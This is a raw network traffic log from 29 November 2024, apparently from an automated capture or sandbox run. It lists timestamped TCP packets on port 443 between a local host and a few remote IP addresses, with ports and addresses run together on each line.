                                                                                                                                                                                    Nov 29, 2024 19:49:56.454128027 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.454137087 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.455349922 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.455353975 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.573580980 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.573653936 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.577372074 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.577378988 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.581903934 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.581908941 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.774699926 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.777556896 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.777580023 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.810281992 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.861219883 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.861237049 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.867485046 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.868429899 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.868467093 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.929179907 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.971107960 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.971122980 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.974385977 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.974787951 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.974802017 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.130412102 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.133385897 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.175333977 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.416549921 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.451302052 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.451383114 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.451397896 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.455827951 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.455845118 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.455980062 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.455984116 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.456945896 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.456949949 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.504868031 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.507476091 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.507492065 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.617784023 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.620270014 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.620295048 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.667866945 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.668180943 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.668195009 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.669200897 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.669260979 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.669631004 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.669693947 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.669754028 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.669761896 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.723054886 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.743391037 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.743633032 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.743648052 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.744992018 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.745052099 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.745521069 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.745616913 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.745724916 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.791343927 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.798445940 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.798459053 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.818644047 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.842242002 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.851835012 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.851849079 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.901766062 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:57.901829958 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.932212114 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:57.932234049 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.017818928 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.065990925 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.102575064 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.148164034 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167772055 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167794943 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167802095 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167834044 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167845964 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167860031 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167901993 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167922020 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167963982 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.167973042 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.176949024 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.190779924 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.190799952 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.193789959 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.193794966 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.195888996 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.195893049 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.220191956 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.222148895 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241046906 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241072893 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241081953 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241111994 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241120100 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241127968 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241144896 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241158009 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241179943 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.241204023 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.247535944 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.291337967 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357156992 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357167006 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357199907 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357233047 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357238054 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357259035 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357286930 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.357302904 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.410075903 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.410096884 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.410142899 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.410160065 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.410186052 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.410203934 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419502974 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419512033 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419542074 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419572115 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419573069 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419595957 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419627905 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.419637918 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.420156956 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.445329905 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.445400953 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.445405960 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.445466995 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.456115961 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.456130028 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.463105917 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.463126898 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.466614962 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.466639042 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.466675043 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.466685057 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.466720104 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.466739893 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.593610048 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.593631029 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.593681097 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.593707085 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.593748093 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.621057034 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.624159098 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.624181986 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.629225016 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.629246950 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.629297018 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.629308939 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.629344940 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.629368067 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.635258913 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.635327101 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.638396025 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.646953106 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.646975040 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.647027016 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.647037029 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.647073030 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.647097111 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.667157888 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.667181969 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.667215109 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.667223930 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.667277098 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.679342985 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.778683901 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.778707981 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.778763056 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.778845072 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.778862000 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.778882980 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.784429073 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.787411928 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.787446976 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.787648916 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.787653923 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.793864012 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.793886900 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.793926001 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.793934107 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.793972015 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.793992996 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.809808969 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.809832096 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.809875965 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.809886932 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.809937000 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.824031115 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.824057102 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.824104071 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.824111938 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.824151993 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.824172020 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.833893061 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.833971024 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.834017992 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.834176064 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.834193945 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.836318970 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.839267015 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:58.839289904 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.990228891 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.990328074 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:58.990381002 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.032962084 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.046237946 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.046266079 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.185781956 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.188652039 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.188713074 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.188726902 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.191174984 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.191180944 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.193058968 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.193063974 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.276892900 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.279927969 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.279927969 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.279963970 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.279973984 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.391556025 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.395399094 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.395422935 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.513494968 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.513524055 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.633080959 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.637404919 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.637434959 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.684016943 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.720645905 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:49:59.720663071 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.720758915 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:49:59.721649885 CET49823443192.168.2.652.149.20.212
                                                                                                                                                                                    Nov 29, 2024 19:49:59.721668959 CET4434982352.149.20.212192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.737473011 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.737500906 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.744155884 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.744188070 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.798088074 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.807142973 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.807174921 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.807781935 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.807786942 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.844497919 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.850693941 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:59.891330957 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:59.999408007 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.003034115 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.003066063 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.200014114 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.202925920 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.202960014 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.285206079 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.344285011 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.344304085 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.356144905 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.356159925 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.400780916 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.406286001 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.406310081 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.415101051 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.415106058 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.487278938 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.497574091 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.497602940 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.651863098 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.699517965 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.773601055 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.773674011 CET44349796172.217.21.36192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.775425911 CET49796443192.168.2.6172.217.21.36
                                                                                                                                                                                    Nov 29, 2024 19:50:00.805751085 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.808830023 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.811428070 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.811449051 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.838159084 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.838190079 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.839701891 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.839709044 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.887733936 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:50:00.887739897 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:50:00.889050007 CET49769443192.168.2.613.107.246.63
